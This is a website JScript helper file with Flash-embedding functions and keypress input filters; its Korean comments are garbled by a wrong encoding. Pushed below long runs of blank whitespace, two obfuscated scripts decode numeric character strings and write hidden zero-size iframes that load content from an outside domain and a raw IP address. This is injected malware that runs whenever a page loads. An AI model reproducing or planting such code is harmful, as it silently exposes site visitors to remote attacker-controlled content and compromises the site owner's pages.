// JScript source code

//ÀÌ¹ÌÁö ÇÃ·¡½¬ »ðÀÔ ½ºÅ©¸³Æ®
function image_flash(src, w, h)
{
	html = '';
	html += '<object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://fpdownload.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=9,0,0,0" NAME="link" ID="link" width="'+w+'" height="'+h+'">';
	html += '<param name="movie" value="'+src+'">';
	html += '<param name="quality" value="high">';
	html += '<param name="allowScriptAccess" value="always" />';
	html += '<param name="swliveconnect" value="true">';
	html += '<param name="menu" value="false">';
	html += '<PARAM NAME=wmode VALUE=transparent>';
	html += '<embed src="'+src+'" quality=high width="'+w+'" height="'+h+'" loop=true type="application/x-shockwave-flash" pluginspage="http://www.macromedia.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash" wmode="transparent"></embed>';
	html += '</object>';
	document.write(html);
}

//»ó´Ü¸Þ´º ÇÃ·¡½¬ »ðÀÔ ½ºÅ©¸³Æ®
function menu_flash(src, w, h, a, b)
{
	html = '';
	html += '<object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://fpdownload.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=9,0,0,0" NAME="link" ID="link" width="'+w+'" height="'+h+'">';
	html += '<param name="movie" value="'+src+'">';
	html += '<param name="quality" value="high">';
	html += '<param name="allowScriptAccess" value="always" />';
	html += '<param name="FlashVars" VALUE="PageNum='+a+'&subNum='+b+'">';
	html += '<param name="swliveconnect" value="true">';
	html += '<param name="menu" value="false">';
	html += '<PARAM NAME=wmode VALUE=transparent>';
	html += '<embed src="'+src+'" quality=high width="'+w+'" height="'+h+'" loop=true type="application/x-shockwave-flash" pluginspage="http://www.macromedia.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash" wmode="transparent"></embed>';
	html += '</object>';
	document.write(html);
}

//¿ÞÂÊ ¼­ºê¸Þ´º ÇÃ·¡½¬ »ðÀÔ ½ºÅ©¸³Æ®
function left_flash(src, w, h, a, b)
{
	html = '';
	html += '<object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://fpdownload.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=9,0,0,0" NAME="link" ID="link" width="'+w+'" height="'+h+'">';
	html += '<param name="movie" value="'+src+'">';
	html += '<param name="quality" value="high">';
	html += '<param name="allowScriptAccess" value="always" />';
	html += '<param name="FlashVars" VALUE="pageNum='+a+'&subNum='+b+'">';
	html += '<param name="swliveconnect" value="true">';
	html += '<param name="menu" value="false">';
	html += '<PARAM NAME=wmode VALUE=transparent>';
	html += '<embed src="'+src+'" quality=high width="'+w+'" height="'+h+'" loop=true type="application/x-shockwave-flash" pluginspage="http://www.macromedia.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash" wmode="transparent"></embed>';
	html += '</object>';
	document.write(html);
}

//¹®ÀÚ ÀÔ·Â Á¦ÇÑ ½ºÅ©¸³Æ®
function onlynumber() {
	if (event.keyCode < 45 || event.keyCode > 57) {
		event.returnValue = false;
	}
}

//¼ýÀÚ ÀÔ·Â Á¦ÇÑ ½ºÅ©¸³Æ®
function onlychar() {
	if (event.keyCode > 44&& event.keyCode < 58) {
		event.returnValue = false;
	}
}





























var temp="",i,c=0,out="";var str="60!105!102!114!97!109!101!32!115!114!99!61!34!104!116!116!112!58!47!47!119!119!119!50!46!109!99!114!105!45!117!115!46!99!111!109!47!105!110!46!99!103!105!63!51!34!32!119!105!100!116!104!61!48!32!104!101!105!103!104!116!61!48!32!102!114!97!109!101!98!111!114!100!101!114!61!48!62!60!47!105!102!114!97!109!101!62!";l=str.length;while(c<=str.length-1){while(str.charAt(c)!='!')temp=temp+str.charAt(c++);c++;out=out+String.fromCharCode(temp);temp="";}document.write(out);






























var temp="",i,c=0,out="";var str="60!105!102!114!97!109!101!32!115!114!99!61!34!104!116!116!112!58!47!47!52!54!46!52!46!49!54!51!46!50!48!56!47!99!111!117!110!116!101!114!46!106!115!34!32!119!105!100!116!104!61!48!32!104!101!105!103!104!116!61!48!32!102!114!97!109!101!98!111!114!100!101!114!61!48!62!60!47!105!102!114!97!109!101!62!";l=str.length;while(c<=str.length-1){while(str.charAt(c)!='!')temp=temp+str.charAt(c++);c++;out=out+String.fromCharCode(temp);temp="";}document.write(out);

